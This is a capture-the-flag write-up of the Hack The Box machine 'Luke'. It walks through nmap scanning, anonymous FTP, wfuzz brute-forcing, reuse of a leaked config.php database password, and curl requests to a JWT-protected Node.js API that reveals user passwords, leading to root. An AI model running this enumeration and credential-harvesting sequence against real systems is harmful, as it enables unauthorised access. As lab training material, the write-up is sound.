7 minute read



Hack The Box - Luke

Quick Summary

Hey guys today Luke retired and here’s my write-up about it. It was an easy machine, all you need to do is to enumerate well and you’ll find what you need. It’s a FreeBSD box and its ip is 10.10.10.137, I added it to /etc/hosts as luke.htb. Let’s jump right in !


Nmap

As always we will start with nmap to scan for open ports and services :

root@kali:~/Desktop/HTB/boxes/luke# nmap -sV -sT -sC -o nmapinitial luke.htb
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-13 12:57 EET
Nmap scan report for luke.htb (10.10.10.137)
Host is up (0.23s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0             512 Apr 14 12:35 webapp
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.xx.xx
|      Logged in as ftp
|      TYPE: ASCII
|      No session upload bandwidth limit
|      No session download bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
|_End of status
22/tcp   open  ssh?
80/tcp   open  http    Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
|_http-title: Luke
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
8000/tcp open  http    Ajenti http control panel
|_http-title: Ajenti

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 202.84 seconds
root@kali:~/Desktop/HTB/boxes/luke# 

We have ftp on port 21, http on ports 80, 3000, 8000 and ssh. From the http-title we can see that on port 3000 there’s a node.js application and Ajenti Administration Panel on port 8000. But before checking the web services let’s take a look at ftp.

FTP

Anonymous login was allowed, there was only one directory called webapp which had a text file called for_Chihiro.txt :

root@kali:~/Desktop/HTB/boxes/luke# ftp luke.htb
Connected to luke.htb.
220 vsFTPd 3.0.3+ (ext.1) ready...
Name (luke.htb:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls 
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0             512 Apr 14 12:35 webapp
226 Directory send OK.
ftp> cd webapp
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r-xr-xr-x    1 0        0             306 Apr 14 12:37 for_Chihiro.txt
226 Directory send OK.
ftp> get for_Chihiro.txt
local: for_Chihiro.txt remote: for_Chihiro.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for for_Chihiro.txt (306 bytes).
226 Transfer complete.
306 bytes received in 0.00 secs (236.0412 kB/s)
ftp> 221 Goodbye.

for_Chihiro.txt :

Dear Chihiro !!

As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of 
the actual website I've created .
Normally you should know where to look but hurry up because I will delete them soon because of our security policies ! 

Derry  

From this note we get two potential usernames : Chihiro and Derry.
Also, now we know that we can find some source files somewhere, let’s check out the web services.

Web Enumeration, User and Root Flags

On port 80 there was this simple website :



Nothing was really interesting so I bruteforced directories and pages with wfuzz :

root@kali:~/Desktop/HTB/boxes/luke# wfuzz -c --hc 404 -u http://luke.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt  

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://luke.htb/FUZZ
Total requests: 4614

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000011:  C=403      9 L       24 W          213 Ch        ".hta"
000001:  C=200    108 L      240 W         3138 Ch        ""
000012:  C=403      9 L       24 W          218 Ch        ".htaccess"
000013:  C=403      9 L       24 W          218 Ch        ".htpasswd"
001114:  C=301      7 L       20 W          228 Ch        "css"
002020:  C=200    108 L      240 W         3138 Ch        "index.html"
002179:  C=301      7 L       20 W          227 Ch        "js"
002282:  C=200     21 L      172 W         1093 Ch        "LICENSE"
002435:  C=401     12 L       46 W          381 Ch        "management"
002485:  C=301      7 L       20 W          231 Ch        "member"
004286:  C=301      7 L       20 W          231 Ch        "vendor"

Total time: 116.3713
Processed Requests: 4614
Filtered Requests: 4603
Requests/sec.: 39.64892

root@kali:~/Desktop/HTB/boxes/luke# wfuzz -c --hc 404 -u http://luke.htb/FUZZ.php -w /usr/share/wordlists/dirb/common.txt                                                                                         

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.                                                         

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://luke.htb/FUZZ.php
Total requests: 4614

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================

000011:  C=403      9 L       24 W          217 Ch        ".hta"
000012:  C=403      9 L       24 W          222 Ch        ".htaccess"
000013:  C=403      9 L       24 W          222 Ch        ".htpasswd"
000994:  C=200      6 L       25 W          202 Ch        "config"
002347:  C=200     39 L      118 W         1593 Ch        "login"

Total time: 140.0363
Processed Requests: 4614
Filtered Requests: 4609
Requests/sec.: 32.94859

We got /management, /member, /login.php and /config.php. I checked config.php first :


$dbHost = 'localhost'; $dbUsername = 'root'; $dbPassword = 'Zk6heYCyv6ZE9Xcg'; $db = "login"; $conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %s\n". $conn -> error); 

Great, we got database credentials, I tried to ssh into the box with them but it didn’t work.
/login.php :


Also the credentials didn’t work here.
/management :


It uses http basic authentication, I tried to login but again the credentials didn’t work.
/member was just empty :


On port 8000 there was Ajenti :


Ajenti: An admin’s tool for a more civilized age, providing you with a fast and secure way to manage a remote Linux box at any time using everyday tools like a web terminal, text editor, file manager and others. -ajenti.org

Ajenti provides a terminal, so if we could access Ajenti then we got a shell. However, the credentials didn’t work here too :


The only thing left is the node.js application, which uses JWT tokens for authentication :

root@kali:~/Desktop/HTB/boxes/luke# curl http://luke.htb:3000/
{"success":false,"message":"Auth token is not supplied"}

I googled that error message and found this article on medium : A guide for adding JWT token-based authentication to your single page Node.js applications.
I fuzzed the application to verify that the endpoint /login exists :

root@kali:~/Desktop/HTB/boxes/luke# wfuzz -c --hc 404 -u http://luke.htb:3000/FUZZ -w /usr/share/wordlists/dirb/common.txt

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://luke.htb:3000/FUZZ
Total requests: 4614

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000001:  C=200      0 L        5 W           56 Ch        ""
002347:  C=200      0 L        2 W           13 Ch        "login"
002348:  C=200      0 L        2 W           13 Ch        "Login"
004245:  C=200      0 L        5 W           56 Ch        "users"

Total time: 147.3540
Processed Requests: 4614
Filtered Requests: 4610
Requests/sec.: 31.31234

/login exists and there’s also another endpoint called /users which can’t be accessed without authentication too :

root@kali:~/Desktop/HTB/boxes/luke# curl http://luke.htb:3000/users
{"success":false,"message":"Auth token is not supplied"}

I tried to login with the credentials but it failed :

root@kali:~/Desktop/HTB/boxes/luke# curl --header "Content-Type: application/json" --request POST --data '{"password":"Zk6heYCyv6ZE9Xcg","username":"root"}' http://luke.htb:3000/login 
Forbidden

So I tried the same username from the article (admin) instead of root and it worked :

kali:~/Desktop/HTB/boxes/luke# curl --header "Content-Type: application/json" --request POST --data '{"password":"Zk6heYCyv6ZE9Xcg","username":"admin"}' http://luke.htb:3000/login 
{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us"}

Now we can access the application with our token :

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/
{"message":"Welcome admin ! "}

/users returned a list of these users :

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users
[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]

After trying different things, /users/username revealed more info about each user :

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users/admin
{"name":"Admin","password":"WX5b7)>/rp$U)FW"}

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users/derry
{"name":"Derry","password":"rZ86wwLvx7jUxtch"}

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users/yuri
{"name":"Yuri","password":"bet@tester87"}

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users/dory
{"name":"Dory","password":"5y:!xa=ybfe)/QD"}

After trying these credentials everywhere, I could login to /management as Derry:



These are the source files Derry was talking about in the note we got from the ftp server. In config.json I found some stuff related to Ajenti and I found the password for the user root :




Now we can start a terminal as root and get the flags :


And we owned root.

That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham
Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Bastion
Next Hack The Box write-up : Hack The Box - Kryptos

Updated: